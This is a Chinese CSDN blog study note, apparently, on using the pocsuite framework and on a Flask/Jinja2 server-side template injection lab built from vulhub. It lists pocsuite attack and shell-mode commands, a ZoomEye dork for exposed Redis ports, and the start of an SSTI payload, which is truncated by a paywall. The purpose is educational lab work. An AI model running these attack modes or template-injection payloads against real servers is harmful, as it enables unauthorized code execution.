python安全攻防第三章之Poc

最新推荐文章于 2024-05-25 11:49:37 发布
最新推荐文章于 2024-05-25 11:49:37 发布
阅读量633 收藏
点赞数
分类专栏: python安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109005216
版权
本文介绍了pocsuite的安装和使用,特别是如何利用--verify和--attack参数进行漏洞验证和攻击。接着讲解了Flask框架的基础知识,指出其依赖的Jinja2模板引擎可能存在的安全风险,因为未经过滤的name参数可能导致安全问题。提供了利用代码示例,并讨论了编写POC验证模块的方法。最后,提出了针对Flask框架模板注入漏洞的防范措施,即过滤“{{}}”符号防止代码执行。
摘要由CSDN通过智能技术生成

pocsuite安装

  1. 安装pocsuite3

pip3 install pocsuite

  1. 安装数据包
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/ 

requirement.txt内容
requests == 2.22.0
PySocks == 1.7.1
requests-toolbelt == 0.9.1
urllib3 == 1.25.6
  • 在使用pocsuite时,我们可以用–verify参数调用_verify方法,验证目标是否存在漏洞;
  • 用–atack参数时调用_attack方法,用来向目标发起攻击
python pocsuite.py -r pocs/test.py(脚本路径) -u  targe-url --verify
python pocsuite.py -r pocs/test.py(脚本路径) -f 1.txt(目标地址文件) --verify
python pocsuite.py -r pocs/* - u  targe-url --verify	#使用所有poc测试
python pocsuite.py -r pocs/test.py(脚本路径) -u  targe-url --verify --threads 10
python cli.py --dork 'port:6379' --vul-keyword 'redis ' --max-page
#使用zoomeye搜索引擎
python pocsuite.py -r pocs/test.py(脚本路径) - u  targe-url --attack 	#攻击模式
python pocsuite.py -r pocs/test.py(脚本路径) - u  targe-url --shell 	#交互模式
python pocsuite.py -r pocs/test.py(脚本路径) - u  targe-url --attack --command "whomai"

flask简介

Flask是一个使用pyton编写的轻量级Web应用框架,模板引擎则使用Jinja2。Flask属于微框架(micro-framework),这既是优点也是缺点,优点是框架轻量,更新依赖少,更容易专注于安全方面的漏洞,缺点是不得不通过添加插件来增加依赖列表。Flask 依赖中就有造成模板注人漏洞的插件Jinja2的模板引擎,Jinja2 是一个面向Python的模板语言。

  1. 环境安装
git clone https://github.com/vulhub/vulhub.git
进入、vulhub/flask/ssit
docker-compose build
docker-compose up -d

2.代码分析

docker ps -a
docker exec -it 1e8500123856 /bin/bash

在这里插入图片描述

def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

可以看出name未经过滤就传入了服务器

利用代码及方式

payload:

{
   % for c in [].__class__.__base__.__subclasses__
最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
python基础学习第三章之字符串
qq_25785565的博客
02-21 123
上一章涉及到的操作,即标准的序列操作,均可用于字符串 因为字符串是不可变的,故分片赋值是不合法的 字符串格式化操作符% >>> format="Hello,%s,%s enough for ya?" >>> value=('world','Hot') >>> print format % value Hello,world,Hot eno...
python安全攻防_python安全攻防第三章之Poc
weixin_39800957的博客
12-15 435
pocsuite安装安装pocsuite3pip3 install pocsuite安装数据包pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/requirement.txt内容requests == 2.22.0PySocks == 1.7.1requests-toolbelt == 0.9....
POC批量验证Python脚本编写
最新发布
HUANGXIN9898的博客
05-25 797
代码实现基本功能,已暂时符合自己使用需求,此次实践已完成编写目的,但一些容错机制以及细小功能点还需完善,如输入为空程序运行结果,以及代理模块功能待实现。通过此次编程,在熟悉Python编程的同时也深感代码功底的薄弱。不过最后还是学习到不少知识,比如多线程、读写文件、数据类型操作、命令行参数读取、编程模块化思想等。之后可以多尝试使用python编写小demo工具,避免对编程思维生疏。
python学习第三章之运算符——学习自用
weixin_45314480的博客
08-11 88
python学习第三章之运算符——学习自用
python学习第三章之布尔运算符——学习自用
weixin_45314480的博客
08-11 158
python学习第三章之布尔运算符——学习自用
python学习第三章之比较运算符——学习自用
weixin_45314480的博客
08-11 113
python学习第三章之比较运算符——学习自用
Python语言第六章之面向对象
d1122d的博客
04-25 961
形式 class + 名称 (大驼峰命名)print(f"{self.name}在吃饭")print("在运动")# # p就是People类的实例化对象# # 通过对象调用方法# p.eat()# p.run()# p2.eat()# p2.run()"""对象.属性 可以添加属性调用之前, 必须添加了name属性, 所以放在这个属性使用之前"""p.eat()# print("哈哈哈")# p.stu()
Python语言第四章之函数基础
d1122d的博客
04-23 469
定义函数 —— 在函数中编写代码,实现功能调用函数 —— 执行编写的代码函数基本使用def 函数名():函数封装的代码def是英文define的缩写;函数名的命名规则和变量的命名规则要保持一致。
Python语言第五章之字符串
d1122d的博客
04-24 412
字符串就是一串字符, 是编程语言中表示文本的数据类型。
python笔记第十三章之pandas模块
cj1064789374的博客
07-07 160
import numpy as np import pandas as pd#numpd升级版有行列标签 s=pd.Series([1,3,6,np.nan,44,1]) print(s) ''' 0 1.0 1 3.0 2 6.0 3 NaN 4 44.0 5 1.0 dtype: float64 ''' dates=pd.date_range('...
Python for Informatics 第11章之正则表达式(二)
10-22
Python编程语言中,正则表达式是一种强大的文本处理工具,用于匹配、查找、替换等操作。本章节主要探讨了正则表达式的一些关键概念,特别是字符匹配、重复次数以及贪婪与非贪婪模式。 1. **字符匹配** 正则...
Python for Informatics 第11章之正则表达式(四)
10-22
主要介绍了Python for Informatics 第11章之正则表达式(四) 的相关资料,需要的朋友可以参考下
第三章之Bootstrap 表格与按钮功能
12-28
Bootstrap,来自 Twitter,是目前最受欢迎的前端框架。... 学习要点: 1.表格 2.按钮 本节课我们主要学习一下 Bootstrap 表格和按钮功能,通过内置的 CSS 定义,显示各种丰富的效果。...一....Bootstrap 提供了一些丰富的...
python——文件上传脚本
willow_liang的博客
10-28 1128
#bytes和字符串之间的转换 test = 'hello world' print(type(test)) byte = test.encode('utf-8') print(type(byte)) string = byte.decode() #decode解码 print(type(string)) F:\python3.8\python.exe 模块.py <class 'str'> <class 'bytes'> <class 'str'> Proce
python之目录爆破
willow_liang的博客
11-04 1053
队列的使用 import queue q = queue.Queue() #空队列 for i in range(10): q.put(i) while not q.empty(): print(q.get()) 0 1 2 3 4 5 6 7 8 9 import queue import threading q = queue.Queue() #空队列 for i in range(30): q.put(i) def test(q): while not
python之cookie分析器
willow_liang的博客
10-31 953
scapy模块学习 from scapy.all import * def packet_callback(packet): print(packet.show()) sniff(filter="", iface="eth0", prn = packet_callback,count=1, store=0 ) #filter指定过滤器 #iface为设置嗅探器的网卡 #prn指定嗅探到符合过滤器条件的数据包时所调用的回调函数 #count用于指定嗅探的数据包个数 #store不在内存当中保留原始
python安全攻防第五章SQLMap的Tamper脚本
willow_liang的博客
10-19 742
Tamper简介 sqlmap的tamper一般用来绕过waf进行sql注入,脚本在tamper目录下。 以0eunion.py为例 #!/usr/bin/env python """ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re from lib.core.enums import PRIORITY #
第五章5.1redis未授权访问漏洞
willow_liang的博客
10-14 659
5.1未授权访问漏洞 在安全配置,权限认证,授权页面存在逻辑缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库网站等敏感信息写偶。目前存在未授权访问漏洞的服务包括:NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,ZooKeeper等 5.1.1redis未授权访问漏洞介绍 kali下载按照redis客户端redis-cli 1.获取redis资源   wget http://download.redis.io/releases/redis-4.0.
《亚马逊逆向工作法》第三章之《组织:独立单线程领导模式》读后感
02-16
《亚马逊逆向工作法》第三章《组织:独立单线程领导模式》是讲述亚马逊公司在组织架构上的创新与变革。本章主要阐述了亚马逊公司领导模式的改变,从原先的分层管理模式转变为独立单线程领导模式。 独立单线程领导模式是指将一个完整的产品或服务的所有流程都交由一个单一的团队负责,该团队将负责整个流程的设计、开发、测试、部署等各个环节。这种领导模式可以提高工作效率、降低沟通成本和管理成本,同时也可以激发员工的工作热情和创造力。 阅读完本章后,我对亚马逊公司的这种组织方式感到十分惊叹。亚马逊公司在组织架构上的创新与变革,让我对亚马逊公司在竞争中的优势有了更加深刻的认识。同时,我也认为这种领导模式可以在其他公司中得到借鉴和应用。将一个完整的产品或服务的所有流程交由一个单一的团队负责,可以提高工作效率,降低沟通成本和管理成本,这种模式可以在很多公司中得到应用。但是这种模式也存在一些局限性,比如团队规模过大会导致管理难度加大,同时团队成员之间的协作和协调也需要更高的能力。 总的来说,《亚马逊逆向工作法》第三章的内容很值得一读,不仅可以了解到亚马逊公司的创新与变革,也可以为其他公司提供一些思路和借鉴。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值